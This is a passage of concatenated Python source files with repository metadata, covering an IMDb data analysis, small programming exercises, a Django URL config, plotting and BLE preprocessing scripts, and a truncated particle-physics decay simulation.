    g.write("[PAD]\n")
    g.write("[UNK]\n")
    g.write("[CLS]\n")
    g.write("[SEP]\n")
    g.write("[MASK]\n")
    # Emit tokens by descending frequency until the cap is reached.
    for voc, v in sorted(vocab.items(), key=lambda x: -x[1]):
        if count < maximum:
            g.write(voc + '\n')
            count += 1
|
[
"xakari2000@yahoo.co.jp"
] |
xakari2000@yahoo.co.jp
|
577797b5cdeb4682623d63ae93e5352f0efc77d5
|
64ca4584e459bc1890853f824d48b2a5fbb09632
|
/IMDB/IMDB.py
|
493dcdc7b7f4d4fcaf555e97fac2c7d62b1f4ac2
|
[] |
no_license
|
Gozzah/Python
|
24a4d8e20c68362cd220c8bdaf4fc835d9fc3c02
|
fecab54a116c956409fd47f3faac7d1483fb8dda
|
refs/heads/master
| 2021-04-27T20:40:09.241636
| 2018-04-25T13:35:23
| 2018-04-25T13:35:23
| 122,384,268
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import pandas as pd

# IMDb "title.basics" dataset. Missing values are encoded as the literal
# string '\N', so map those to NaN up front.
content = pd.read_csv('https://datasets.imdbws.com/title.basics.tsv.gz',
                      sep='\t', header=0, na_values='\\N', low_memory=False)

# 1. Which year had most movies released?
df = content[content['titleType'] == 'movie']
most_movies = df['startYear'].value_counts()
print(most_movies)

# 2. Which year was most series ended?
# FIX: IMDb spells the title type 'tvSeries' (camelCase); the previous
# filter 'tvseries' matched nothing.
dfSeries = content[content['titleType'] == 'tvSeries']
most_series = dfSeries['endYear'].value_counts()
print('the year where most series ended was: ', most_series.idxmax())

# 3. Which genres has the longest runtime per movies?  (not yet implemented)

# 4. Which genre covers the most movies?
# FIX: 'genres' is a comma-separated list; split it apart and count each
# genre, then take the most frequent one. The previous .max() only returned
# the alphabetically last genre string.
titles = content[content['titleType'] == 'movie']
genre = titles['genres'].dropna().str.split(',').explode().value_counts().idxmax()
print('genre with most movies is: ', genre)

# 5. What is the average runtime on adult films?
# FIX: the genre tag is capitalized ('Adult') and appears inside the
# comma-separated 'genres' field; runtimeMinutes must be coerced to numeric
# before averaging.
genres = content[content['genres'].str.contains('Adult', na=False)]
average = pd.to_numeric(genres['runtimeMinutes'], errors='coerce').mean()
print('average runtime on adultfilms', average)
|
[
"noreply@github.com"
] |
Gozzah.noreply@github.com
|
a691834806912611ff6db8d6b038048e8daf5cdb
|
d1b80aa1bb58313bf851ac51873ff5ddef85368e
|
/oop3.py
|
f2ff8c8a5cc417ebbf8d73057629a5ec3ea34f27
|
[] |
no_license
|
KojoAning/PYHTON_PRACTICE
|
1680ac06e09a8c34c36a89fdcec9507adbe97c6e
|
397ce7feb61a857b90989243a7f78591a58f8ca0
|
refs/heads/master
| 2023-02-27T04:44:47.459776
| 2021-01-31T18:23:44
| 2021-01-31T18:23:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 651
|
py
|
class Employee():
    """Simple employee record built via the constructor (__init__)."""

    # Class-level default shared by all employees.
    no_of_leave = 8

    def __init__(self, aname, asaalary, arole):
        # __init__ runs automatically on construction; no explicit call needed.
        self.name = aname
        self.salary = asaalary
        self.role = arole

    def printditails(self):
        """Return a one-line summary of this employee.

        BUG FIX: previously interpolated ``self.rohan``, an attribute that
        never exists, so every call raised AttributeError; it now uses
        ``self.name``.
        """
        return f"name is {self.name} and salary is {self.salary} and role is {self.role}"
# Construct two employees through the constructor; the commented-out lines
# below show the manual attribute-assignment approach this replaced.
harry = Employee('harry', 40384 ,'instructur')
rohan = Employee('rohan',10338,'student')  # constructor call
# rohan = Employee()
#
# harry.name = 'harry'
# harry.salary = 40384
# harry.role='instrucure'
#
# rohan.name ="Rohan"
# rohan.salary = 45555
# rohan.role = "Student"
print ( harry.salary)
print(rohan.role)
|
[
"srinathshrestha9890@gmail.com"
] |
srinathshrestha9890@gmail.com
|
2cdbc070027cc4df0fe09f2577e29effb7d73d7c
|
a5bfd76ec633a49bc20669aa77ce773f97430151
|
/BLE_preprocessing_3.py
|
4db5a7e5ae8e38e848d4375fe865cf4b60369e46
|
[
"MIT"
] |
permissive
|
alhomayani/Oversampling_BLE_fingerprints
|
8d6f3c2c774c9139ef84a7f4c1559be626e71ea8
|
080ec37072dfa44f73ced3f202e16fa0007bacba
|
refs/heads/main
| 2023-07-05T02:44:20.222386
| 2021-08-30T01:28:26
| 2021-08-30T01:28:26
| 375,171,546
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 531
|
py
|
import pandas as pd
import os

# Preprocessing stage 3: concatenate the per-slot scaled fingerprint CSVs
# into a single dataset file.
result = pd.DataFrame()
os.chdir('C:/Users/uf11/Desktop/BLE_dataset/preprocessing/preprocessing_2')
# NOTE(review): range(1) covers a single phone (index 0 -> file prefix
# phone_3); confirm whether additional phones were meant to be included.
for phone in range(1):
    for slot in range(6):
        # Input files are named phone_<n>_slot_<m>_scaled.csv; the first
        # column is a saved index.
        df_temp = pd.read_csv('phone_' + str(phone + 3) + '_slot_' + str(slot + 1) + '_scaled.csv', index_col=[0])
        print(len(df_temp))
        result = result.append(df_temp, ignore_index=True)
os.chdir('C:/Users/uf11/Desktop/BLE_dataset/preprocessing/preprocessing_3')
# Write the combined dataset and report its row count.
result.to_csv('data_3.csv', index=False)
print(len(result))
|
[
"noreply@github.com"
] |
alhomayani.noreply@github.com
|
08b479d74c044be6254dfbac91e991e192c4ed1b
|
75a2ad10d18aea735eaf3e859eb3988d94e9c36a
|
/CodeUp/기초 100제/6090_종합.py
|
3c59df0144218df4100f715ba24348f87e32ab8c
|
[] |
no_license
|
sbtiffanykim/problem-solving
|
d2679b0405f9c2397d7af780721066bfbd812e32
|
10a6ec90d29c9126f56c9be2ee696ce30ca30bd5
|
refs/heads/master
| 2023-04-25T18:26:56.511663
| 2021-06-10T12:30:13
| 2021-06-10T12:30:13
| 360,552,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
"""
#6090: 수 나열하기 3
"""
a, m, d, n = map(int, input().split())
for i in range(1, n):
a = a * (m) + d
print(a)
|
[
"sbtiffanykim@gmail.com"
] |
sbtiffanykim@gmail.com
|
5cdf1cb88588211b536518f30fdbc77cc70d5712
|
07123806119496981cccf1ca577de7ddc7b59146
|
/COP4531/coinchangemin.py
|
f3e997a09c3bd30c81ee96f542c5205ff6e5fc7e
|
[] |
no_license
|
wcwagner/Algorithms
|
02482be2d5eab79cbc12ae3f78acb16883139ab0
|
10fcae69231f873d68e92b54035ca7fa6a20a359
|
refs/heads/master
| 2020-05-22T01:21:57.168199
| 2016-12-10T21:24:50
| 2016-12-10T21:24:50
| 60,459,776
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
def coin_change_min(N, S):
    """Return the minimum number of coins from S needed to total N.

    Classic bottom-up dynamic program: dp[amt] holds the fewest coins
    summing exactly to amt. Amounts that cannot be formed are left at
    float('inf'), which is also the return value for an unreachable N.
    """
    # dp[i] is minimum coins needed to make amount i; dp[0] == 0.
    dp = [0] * (N + 1)
    for amt in range(1, N + 1):
        best = float("inf")
        for coin in S:
            # Only coins no larger than the target amount can be used.
            if coin <= amt:
                best = min(best, dp[amt - coin] + 1)
        dp[amt] = best
    return dp[N]
if __name__ == "__main__":
S = [1,7, 10]
N = 14
print(coin_change_min(N, S))
S = [1, 5, 10, 25]
N = 98
print(coin_change_min(N, S))
|
[
"wcw13@my.fsu.edu"
] |
wcw13@my.fsu.edu
|
837e94badfe7f215ca75ba23dc83e7f45993c8ef
|
8803bbced7e91c80d29753a3d1cb3bb478a13961
|
/app/session/urls.py
|
8d7877d2b5cb0f3353eb2f8a8f10854e058becf6
|
[] |
no_license
|
jiggum/CS496_Project3
|
e8981ef59f7bf7be20431f175df7fc8c2f44833e
|
afef8670cfca1d87a960cddd57a127b263d4bab0
|
refs/heads/master
| 2021-01-21T02:01:53.898184
| 2016-07-14T01:58:15
| 2016-07-14T01:58:15
| 63,216,265
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
"""null URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
import app.session.views

# Session app routes: login/logout/registration plus the post-login home page.
urlpatterns = [
    url(r'^login/$', app.session.views.login_view),
    url(r'^logout/$', app.session.views.user_logout),
    url(r'^register/$', app.session.views.register_view),
    url(r'^home/$', app.session.views.home, name='home'),
]
|
[
"0s.dongmin@gmail.com"
] |
0s.dongmin@gmail.com
|
2b8227feb761065cb5bbc4d63f58e5982e62e35b
|
0e586424141e41891dc58b95ddb25fff472f2002
|
/acros/apps/generator/magic.py
|
e863fbad2eed021378d27b67c786b940987b4bc2
|
[] |
no_license
|
nicorellius/acrosite
|
facb682e95dc4847f1af3ba6f742abc64d038dd5
|
c64832a78738f57cdad1b7a07b81279342cdff75
|
refs/heads/master
| 2022-12-04T16:50:23.564543
| 2020-02-26T00:16:39
| 2020-02-26T00:16:39
| 25,777,397
| 2
| 0
| null | 2022-11-22T00:34:05
| 2014-10-26T15:07:33
|
Python
|
UTF-8
|
Python
| false
| false
| 3,083
|
py
|
import unittest
import operator
import nltk
def first_letter(word):
    """Return the first character of *word*."""
    initial = word[0]
    return initial
def get_formats(word):
    """
    Use the word's length to determine useful pos structures.

    For example, given the word 'Fun' (three letters) this should return a
    list of three parts of speech — or several such lists when available.

    Currently a stub: it only echoes the word and returns no formats.

    :param word: word whose length drives the lookup
    :return: a (currently always empty) set of pos structures
    """
    print(word)
    # TODO: map word length (possibly +-2 to allow for contractions) onto the
    # known pos formats and return that set.
    return []
def rank_formats(formats):
    """
    Rank a set of pos formats.

    :param formats: a set of pos formats
    :return: a mapping of those formats keyed and grouped by rank
        (stub: currently always empty)
    """
    # TODO: implement the actual ranking.
    return {}
def get_word(format_element, knowledge):
    """Pick a word for *format_element* given the current *knowledge*.

    Stub: always returns None.
    """
    return None
def update(acrostic, knowledge):
    """Fold the acrostic's current state into *knowledge* and return it.

    Stub: returns *knowledge* unchanged (knowledge + more info + current
    state of the acrostic, eventually).
    """
    return knowledge
def money_maker(word, theme):
    """
    Build the best-scoring acrostic phrase for *word*.

    Given a word:

    1. determine its pos formats,
    2. for each ranked format, map each pos element (and the theme) to a
       word, updating the accumulated knowledge as the acrostic grows,
    3. return the candidate acrostic with the best knowledge score.

    Use Markov chains -- http://en.wikipedia.org/wiki/Parody_generator

    NOTE: the helper functions this relies on are still stubs, so with the
    current stubs ``candidates`` stays empty and ``max`` raises ValueError.

    :param word: A word
    :param theme: Theme used to steer word selection
    :return: An awesome phrase
    """
    candidates = {}
    knowledge = {}
    # FIX: iterate key/value pairs explicitly — rank_formats returns a
    # mapping, and iterating a dict directly yields only keys.
    for key, value in rank_formats(get_formats(word)).items():
        # knowledge.self(key, theme)
        acrostic = []
        for format_element in value:
            # FIX: don't shadow the *word* parameter inside the loop.
            picked = get_word(format_element, knowledge)
            update(acrostic, knowledge)
            acrostic.append(picked)
        # FIX: lists are unhashable, so key the candidate by a tuple.
        candidates[tuple(acrostic)] = knowledge
    # FIX: dict.iteritems() is Python 2 only; use items() (this file already
    # uses the Python 3 print() function).
    return max(candidates.items(), key=operator.itemgetter(1))[0]
def get_format(acrostic):
    """
    Tag each word of *acrostic* with its nltk tag.

    The tags consist of the basic parts of speech plus other nltk-specific
    tags that are useful in the nltk universe.

    :param acrostic: an acrostic or phrase string
    :return: a list of nltk tags, one per token
    """
    tagged = nltk.pos_tag(nltk.word_tokenize(acrostic))
    return [tag for _token, tag in tagged]
class WordMagicTest(unittest.TestCase):
    """Smoke tests for the word utilities in this module."""

    def test(self):
        # first_letter should return the initial character unchanged
        self.assertEqual(first_letter("Abracadabra"), "A")
        # expected nltk POS sequences for a few sample phrases
        cases = [
            ("So happy it's Thursday", ['IN', 'JJ', 'PRP', 'VBZ', 'NNP']),
            ("Thank God it's Friday", ['NNP', 'NNP', 'PRP', 'VBZ', 'NNP']),
            ("We're always cuddling koala's yearly",
             ['PRP', 'VBP', 'RB', 'VBG', 'NN', 'POS', 'JJ']),
        ]
        for phrase, expected in cases:
            self.assertEqual(get_format(phrase), expected)
        # self.assertEqual(get_formats('sample'),'sample')
|
[
"nicorellius@gmail.com"
] |
nicorellius@gmail.com
|
31233364461835df2c43081144994282f4ec6fb9
|
1af44bdcbc3c15d3f6e436a7924dfd45f504ab3a
|
/01.jump to python/02.Data Science/4. Visualization/282_matplotlib_basic_histogram.py
|
1a6596ad54616f6c7081fcc544fd649f78d2ef6a
|
[] |
no_license
|
wql7654/bigdata_exam
|
f57c8b475690cbc5978009dbf8008bedff602e2a
|
c07ee711bb84407428ba31165185b9607b6825e8
|
refs/heads/master
| 2023-04-07T00:50:59.563714
| 2021-05-25T02:46:43
| 2021-05-25T02:46:43
| 180,915,985
| 0
| 0
| null | 2023-03-25T01:08:09
| 2019-04-12T02:36:08
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 723
|
py
|
import numpy as np
import matplotlib.pyplot as plt

plt.style.use('ggplot')

# Two Gaussian samples: same spread, different centres.
mu1, mu2, sigma = 100, 130, 15
x1 = mu1 + sigma*np.random.randn(10000)
x2 = mu2 + sigma*np.random.randn(10000)

fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)

# FIX: `normed` was deprecated in Matplotlib 2.1 and removed in 3.x;
# `density` is the drop-in replacement (False = raw counts, as before).
n, bins, patches = ax1.hist(x1, bins=50, density=False, color='darkgreen')
n, bins, patches = ax1.hist(x2, bins=50, density=False, color='orange', alpha=0.5)

ax1.xaxis.set_ticks_position('bottom')
ax1.yaxis.set_ticks_position('left')
plt.xlabel('Bins')
plt.ylabel('Number of Values in Bin')
fig.suptitle('Histograms', fontsize=14, fontweight='bold')
ax1.set_title('Two Frequency Distributions')

# Save before show(): some backends clear the figure after show().
plt.savefig('histogram.png', dpi=400, bbox_inches='tight')
plt.show()
|
[
"studerande5@gmail.com"
] |
studerande5@gmail.com
|
5259e96e8c7daf9bb2b22b369534042c3cb434cf
|
31b51aeb96000318df21351b2ef6cb55f7c269c2
|
/HiNT/corelib.py
|
99d11739955e91cefcf71310c01c8bcf9d3bd653
|
[
"Artistic-1.0-Perl",
"MIT"
] |
permissive
|
suwangbio/HiNT
|
a26062f6c39929803a4aded5465743768a81b8c5
|
99f0aa91d10c5fccabcbd56035f6e3125650a720
|
refs/heads/master
| 2022-04-08T23:13:25.344196
| 2020-02-17T22:22:13
| 2020-02-17T22:22:13
| 240,967,519
| 0
| 0
|
NOASSERTION
| 2020-02-16T21:19:00
| 2020-02-16T21:18:59
| null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# print current time and information on screen
import subprocess
from subprocess import call as subpcall
import sys, os, time
import logging
# Short aliases so callers can write error()/warn() without the logging prefix.
error = logging.critical # function alias: logs at CRITICAL level
warn = logging.warning   # function alias: logs at WARNING level
def Info(infoStr):
    """Print *infoStr* to stdout prefixed with the current HH:MM:SS timestamp."""
    timestamp = time.strftime('%H:%M:%S')
    print("[{}] {}".format(timestamp, infoStr))
def run_cmd(command):
    """Run *command* through the system shell and wait for it to finish."""
    # shell=True hands the string to /bin/sh -- convenient for pipelines, but
    # unsafe with untrusted input (shell injection); callers must sanitize.
    subpcall (command, shell = True)
|
[
"1210070_suwang@tongji.edu.cn"
] |
1210070_suwang@tongji.edu.cn
|
c56605a1ff97ce5490fd9b73b12308ef4cae495d
|
50608ac21fb2124a8b73ba5299e947d8a3be142b
|
/simulation/python/inversion_v2.1_selvhenfall_xisquared-plotting.py
|
341f45fbec143208b4c69d91f144315092346064
|
[] |
no_license
|
jorgenem/master
|
88e71bc935af9cf23585d3b2ec191bc4e01f6c00
|
7e898f747d21ad13c205c16b1e89d41fa9ac1a7e
|
refs/heads/master
| 2020-05-20T12:34:14.786285
| 2015-06-04T23:26:22
| 2015-06-04T23:26:22
| 25,069,231
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,093
|
py
|
#import stuff
import numpy as np
import matplotlib.pyplot as plt
from math import pi
import scipy.optimize as sciopt
np.random.seed(2) # set seed for reproducibility
# ====== define useful functions ========
def proj(v, u):
    """Return the projection of row vector *v* onto *u* (or *u* itself when
    *u* has zero length, so downstream Gram-Schmidt stays well-defined)."""
    if np.linalg.norm(u) <= 0:
        return u
    scale = float(np.dot(u, u.T))
    return np.dot(u, np.transpose(v)) / scale * u
def minkowskidot(a, b):
    """Minkowski inner product (+,-,-,-) of two 1x4 row matrices (E, px, py, pz)."""
    time_part = a[0,0] * b[0,0]
    space_part = a[0,1] * b[0,1] + a[0,2] * b[0,2] + a[0,3] * b[0,3]
    return float(time_part - space_part)
def minkowskinorm(a):
    """Minkowski norm-squared of *a*, i.e. the inner product of *a* with itself."""
    return minkowskidot(a, a)
def decayfun(m1,P1,m2,m3):
    """Simulate the isotropic two-body decay 1 -> 2 + 3.

    :param m1: mass of the decaying particle
    :param P1: 1x4 np.matrix, lab-frame four-momentum (E, px, py, pz) of particle 1
    :param m2: mass of decay product 2
    :param m3: mass of decay product 3
    :return: (P2, P3) lab-frame four-momenta of the decay products; the decay
        direction is drawn uniformly on the sphere in particle 1's rest frame,
        so this consumes two np.random.uniform draws per call.
    """
    # Calculating four-momenta of particle 2&3 going back-to-back from
    # decay of particle 1 in the frame where particle 1 has 4-mom P1
    #
    # particle 1 = decaying particle
    # particle 2 & particle 3 = decay products
    # primed system is rest frame of particle 1, unprimed is lab frame
    # rotated system is at rest in lab system,
    # but rotated so particle one goes in +x direction
    p1 = P1[0,1:4]
    p1abs = np.sqrt( float( np.dot( p1 , np.transpose(p1) ) ) ) # 3-momentum
    # of particle 1 in the lab frame

    # == Kinematical decay in RF of particle 1 ==
    p2absprime = 1.0/(2*m1) * np.sqrt( (m1**2-m2**2-m3**2)**2- 4*m2**2*m3**2 ) # abs-val
    # of 3-momentum of particle 2/3 in RF of particle 1
    U, V = np.random.uniform(0,1,2) # random
    phi = 2*pi*U # point picking
    theta = np.arccos(2*V-1) # on a sphere
    # Calculate cartesian 3- and 4-momentum of particle 2&3
    p2prime = np.matrix([ p2absprime*np.sin(theta)*np.cos(phi) ,
                          p2absprime*np.sin(theta)*np.sin(phi) ,
                          p2absprime*np.cos(theta) ])
    p3prime = -p2prime
    E2prime = np.sqrt( p2absprime**2 + m2**2 )
    E3prime = np.sqrt( p2absprime**2 + m3**2 )
    P2prime = np.matrix([ E2prime , p2prime[0,0] , p2prime[0,1] , p2prime[0,2] ])
    P3prime = np.matrix([ E3prime , p3prime[0,0] , p3prime[0,1] , p3prime[0,2] ])

    # == Back-transform to lab frame ==
    # First check whether it is necessary to boost
    if p1abs > 1e-10:
        # Lorentz boost along x-direction to get to rotated lab frame
        # (lab frame moves in negative x direction)
        vlab = -p1abs/np.sqrt(p1abs**2 + m1**2) # velocity of particle 1 in lab frame
        gamma = 1/np.sqrt(1-vlab**2)
        P2rot = np.matrix([ gamma*(P2prime[0,0] - vlab*P2prime[0,1]) ,
                            gamma*(P2prime[0,1] - vlab*P2prime[0,0]) ,
                            P2prime[0,2] , P2prime[0,3] ])
        P3rot = np.matrix([ gamma*(P3prime[0,0] - vlab*P3prime[0,1]) ,
                            gamma*(P3prime[0,1] - vlab*P3prime[0,0]) ,
                            P3prime[0,2] , P3prime[0,3] ])
        # == Rotate back to lab frame ==
        # Calculate the unit vectors of the rotated system axes in terms of lab axes
        # The definition is that x axis is along p1.
        # For the other axes we must make a choice - y&z directions are undetermined,
        # only the yz plane is determined from x choice. But since we have drawn
        # random angles and the yz plane is not boosted, the choice does not matter
        # as long as we are consistent from event to event.
        # So we pick two vectors orthogonal to p1 and do Gram-Schmidt orthogonalization:
        v1 = p1
        v2 = np.matrix([ p1[0,1] , -p1[0,0] , 0 ])
        v3 = np.matrix([ p1[0,2] , 0 , -p1[0,0] ])
        u1 = v1
        u2 = v2 - proj(v2,u1)
        u3 = v3 - proj(v3,u1) - proj(v3,u2)
        # Fall back to fixed axes when a Gram-Schmidt vector degenerates to zero
        xrot = u1/np.linalg.norm(u1) if np.linalg.norm(u1) > 0 else np.matrix([0,0,1])
        yrot = u2/np.linalg.norm(u2) if np.linalg.norm(u2) > 0 else np.matrix([0,1,0])
        zrot = u3/np.linalg.norm(u3) if np.linalg.norm(u3) > 0 else np.matrix([1,0,0])
        # Form a matrix T which takes a vector in the lab basis to a vector
        # in the rotated basis by
        T = np.concatenate( (xrot , yrot , zrot) , axis=0 )
        # What we need is to rotate from rotated basis to lab basis, so we need the inverse
        # - which is the transpose, since rotation matrices are orthogonal.
        # Also, to ease calculation, we let T be the 3x3 submatrix of T4, setting the [0,0]
        # component of T4 to 1 to leave time component invariant under this spatial rotation
        T4 = np.matrix([[1, 0, 0, 0],
                        [0,T[0,0],T[0,1],T[0,2]],
                        [0,T[1,0],T[1,1],T[1,2]],
                        [0,T[2,0],T[2,1],T[2,2]] ])
        P2 = T4.T*P2rot.T
        P3 = T4.T*P3rot.T
        P2 = P2.T
        P3 = P3.T
    # If it was unneccessary, i.e. decay happened in lab frame, then
    else:
        P2 = P2prime
        P3 = P3prime
    # Finished!
    return P2, P3
def smear(p, resolution):
    """Gaussian-smear four-momentum *p* following the AcerDET prescription:
    scale all components by 1 + N(0,1) * resolution / sqrt(E).

    Consumes exactly one np.random.randn() draw per call.
    """
    noise = np.random.randn()
    factor = 1 + noise * resolution / np.sqrt(p[0, 0])
    return p * factor
# ==== MAIN PART ====
# Set known parameters
# SM particle masses
# u-quark and electron mass set to zero
mquark = m1 = m5 = 0;
mlepton1 = m2 = m3 = 0;
mlepton2 = m6 = m7 = 0;
# Now to make a mass hypothesis (guess the correct one)
MSuL = 565.312 # Mass of ~uL, ~cL
MSdL = 570.734 # Mass of ~dl, ~sL
Msquark = MZ =(MSuL+MSdL)/2.0 # mean squark mass, fit this
MN2 = Mchi2 = MY = 180.337 # Mass of ~chi02
Mslepton = MseR = MX = 144.06 # Mass of ~eR, ~muR
# include left-handed sleptons? Must be done in the branchings before Herwig simulation in case
MN1 = Mchi1 = MN = 9.70071979E+01 # Mass of ~chi01 (dark matter!)
# primed masses: second decay chain is assumed identical to the first
MZprim = MZ
MYprim = MY
MXprim = MX
MNprim = MN
true_values = np.array([MZ,MY,MX,MN])
N = 100  # number of simulated events
# per-event Webber matrices/vectors, filled by the event loop below
Dlist = []
Elist = []
Adetlist = np.zeros(0)
A_nosmeardetlist = np.zeros(0)
# Define normalizing mass (characteristic mass scale of the problem)
Mnorm = 100
# print "Mnorm = ", Mnorm
# Save invariant masses for making triangle
invariant_mass_between_c1_leptons = []
# N - How much loop?
# Event loop: simulate N cascade-decay events and store, per event, the
# Webber D matrix and E vector from which the mass-fit chi^2 is built.
for i in range(N):
    # Loop over events to get 4-vectors for each particle for each event.
    # Particles are numbered according to Webber (arXiv:0907.5307v2) fig. 1
    # (the lepton/antilepton ordering is arbitrary in each chain, the lepton has been
    # chosen as 2/6 and the antilepton as 3/7)

    # string = root[i+2].text
    # lines = string.splitlines()

    #1st chain, p1-4
    # Read squark 1 from file
    # psquark1 = str(lines[4]).split()
    # print "PDG number of particle 1: ",psquark1[0] # just to check
    #p1 = [float(p1[9]), float(p1[6]), float(p1[7]), float(p1[8])]
    # psquark1 = np.matrix([ float(psquark1[9]), float(psquark1[6]), float(psquark1[7]), float(psquark1[8])])
    # NOTE(review): with the (E, px, py, pz) convention used by decayfun this
    # gives the squark E=0, pz=Msquark, while the commented DEBUG line below
    # used (Msquark, 0, 0, 0) = "at rest" -- confirm which setup is intended.
    psquark1 = np.matrix([0,0,0,Msquark])
    # #DEBUG
    # psquark1 = np.matrix([ Msquark, 0, 0, 0]) # overwrite CompHEP data to start squarks at rest
    # #/DEBUG

    # Decay squark to quark and neutralino2
    p1, pN21 = decayfun(Msquark,psquark1,mquark,MN2)
    # Decay neutralino2 to lepton1 and slepton
    p2, pseR1 = decayfun(MN2,pN21,mlepton1,MseR)
    # Decay slepton to (anti)lepton1 and neutralino1
    p3, p4 = decayfun(MseR,pseR1,mlepton1,MN1)

    #2nd chain, p5-8
    # psquark2 = str(lines[5]).split()
    # # print "PDG number of particle 5: ",psquark2[0] # just to check
    # psquark2 = np.matrix([ float(psquark2[9]), float(psquark2[6]), float(psquark2[7]), float(psquark2[8])])
    psquark2 = np.matrix([0,0,0,Msquark])
    # #DEBUG
    # psquark2 = np.matrix([ Msquark, 0, 0, 0]) # overwrite CompHEP data to start squarks at rest
    # #/DEBUG
    # See whether CompHEP produces squarks off-shell
    # print minkowskinorm(psquark1) - Msquark**2
    # print minkowskinorm(psquark2) - Msquark**2

    # Decay (anti)squark to (anti)quark and neutralino2
    p5, pN22 = decayfun(Msquark,psquark2,mquark,MN2)
    # Decay neutralino2 to lepton2 and slepton
    p6, pseR2 = decayfun(MN2,pN22,mlepton2,MseR)
    # Decay slepton to (anti)lepton2 and neutralino1
    p7, p8 = decayfun(MseR,pseR2,mlepton2,MN1)

    # DETERMINANT TEST
    # pxmiss_nosmear = - p1[0,1] - p2[0,1] - p3[0,1] - p5[0,1] - p6[0,1] - p7[0,1]
    # pymiss_nosmear = - p1[0,2] - p2[0,2] - p3[0,2] - p5[0,2] - p6[0,2] - p7[0,2]
    # A_nosmear = 1/Mnorm*2*np.matrix([[ p1[0,1] , p1[0,2] , p1[0,3] , -p1[0,0] , 0 , 0 , 0 , 0 ],
    # [ p2[0,1] , p2[0,2] , p2[0,3] , -p2[0,0] , 0 , 0 , 0 , 0 ],
    # [ p3[0,1] , p3[0,2] , p3[0,3] , -p3[0,0] , 0 , 0 , 0 , 0 ],
    # [ 0.5*pxmiss_nosmear , 0 , 0 , 0 , 0.5*pxmiss_nosmear,0 , 0 , 0 ],
    # [ 0 , 0 , 0 , 0 , p5[0,1] , p5[0,2] , p5[0,3] , -p5[0,0] ],
    # [ 0 , 0 , 0 , 0 , p6[0,1] , p6[0,2] , p6[0,3] , -p6[0,0] ],
    # [ 0 , 0 , 0 , 0 , p7[0,1] , p7[0,2] , p7[0,3] , -p7[0,0] ],
    # [ 0 ,0.5*pymiss_nosmear, 0 , 0 , 0 , 0.5*pymiss_nosmear , 0 , 0 ]])
    # / DETERMINANT TEST

    # Smear, r percent resolution
    # r = resolution # percent/100 momentum smearing
    # p1 = smear(p1,r)
    # p2 = smear(p2,r)
    # p3 = smear(p3,r)
    # p5 = smear(p5,r)
    # p6 = smear(p6,r)
    # p7 = smear(p7,r)

    # Check invariant mass of initial colliding partons?
    #print minkowskinorm(p1+p2+p3+p4+p5+p6+p7+p8)
    # Check that the invariant mass of particles is close to shell mass
    # print minkowskinorm(p1) - m1**2
    # print minkowskinorm(p2) - m2**2
    # print minkowskinorm(p3) - m3**2
    # print minkowskinorm(p4) - MN**2
    # print minkowskinorm(p5) - m5**2
    # print minkowskinorm(p6) - m6**2
    # print minkowskinorm(p7) - m7**2
    # print minkowskinorm(p8) - MNprim**2
    # Check if invariant mass of decays match mass of decaying
    # print "p3+p4 ", np.sqrt(abs(minkowskinorm(p3+p4) - MX**2))
    # print "p2+p3+p4 ", np.sqrt(abs(minkowskinorm(p2+p3+p4) - MY**2))
    # print "p1+p2+p3+p4 ", np.sqrt(abs(minkowskinorm(p1+p2+p3+p4) - MZ**2))
    # print "p7+p8 ", np.sqrt(abs(minkowskinorm(p7+p8) - MXprim**2))
    # print "p6+p7+p8 ", np.sqrt(abs(minkowskinorm(p2+p3+p4) - MYprim**2))
    # print "p5+p6+p7+p8 ", np.sqrt(abs(minkowskinorm(p1+p2+p3+p4) - MZprim**2))

    # Calculate invariant mass between leptons for triangle plotting
    # invmass_c1leptons = np.sqrt(minkowskinorm(p2+p3)) # calculate invariant
    # invariant_mass_between_c1_leptons.append(invmass_c1leptons) # mass between leptons in chain 1

    # ==== Define Webber's stuff ====
    # need the pxmiss and pymiss, taken from the actual neutralino transverse momenta
    # (this is cheating, of course)
    # pxmiss = p4[0,1]+p8[0,1]
    # pymiss = p4[0,2]+p8[0,2]

    # Calculate missing transverse from (smeared) visible particles
    pxmiss = - p1[0,1] - p2[0,1] - p3[0,1] - p5[0,1] - p6[0,1] - p7[0,1]
    pymiss = - p1[0,2] - p2[0,2] - p3[0,2] - p5[0,2] - p6[0,2] - p7[0,2]

    m1square = minkowskinorm(p1)
    m2square = minkowskinorm(p2)
    m3square = minkowskinorm(p3)
    m5square = minkowskinorm(p5)
    m6square = minkowskinorm(p6)
    m7square = minkowskinorm(p7)

    # print "pxmiss", pxmisstrue - pxmiss
    # print "pymiss", pymisstrue - pymiss

    #A matrix
    A = 2*np.matrix([[ p1[0,1] , p1[0,2] , p1[0,3] , -p1[0,0] , 0 , 0 , 0 , 0 ],
                     [ p2[0,1] , p2[0,2] , p2[0,3] , -p2[0,0] , 0 , 0 , 0 , 0 ],
                     [ p3[0,1] , p3[0,2] , p3[0,3] , -p3[0,0] , 0 , 0 , 0 , 0 ],
                     [ 0.5*pxmiss, 0 , 0 , 0 , 0.5*pxmiss,0 , 0 , 0 ],
                     [ 0 , 0 , 0 , 0 , p5[0,1] , p5[0,2] , p5[0,3] , -p5[0,0] ],
                     [ 0 , 0 , 0 , 0 , p6[0,1] , p6[0,2] , p6[0,3] , -p6[0,0] ],
                     [ 0 , 0 , 0 , 0 , p7[0,1] , p7[0,2] , p7[0,3] , -p7[0,0] ],
